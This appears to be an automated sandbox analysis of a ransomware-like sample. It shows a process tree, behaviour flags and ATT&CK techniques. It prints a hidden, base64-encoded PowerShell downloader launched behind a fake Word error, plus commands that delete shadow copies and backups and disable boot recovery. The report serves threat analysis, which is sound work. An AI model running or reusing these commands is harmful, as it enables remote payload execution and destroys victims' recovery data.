C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==2⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exeC:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ssd\onset\goodram.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ssd\onset\81ldp.bat" "3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\ssd\onset\15sp.exe"15sp.exe" e -psion0811 01s.rar4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ssd\onset\Ztestram.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ssd\onset\sata1.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\ssd\"6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
-
C:\ssd\onset\mesager43.exemesager43.exe /start6⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet8⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet9⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet9⤵
- Interacts with shadow copies
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 08⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\notepad.exenotepad.exe8⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 15sp.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 15sp.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\ssd\onset\mesager43.exe"6⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 46⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 44⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Hidden Files and Directories
2Registry Run Keys / Startup Folder
1Modify Existing Service
1Defense Evasion
File Deletion
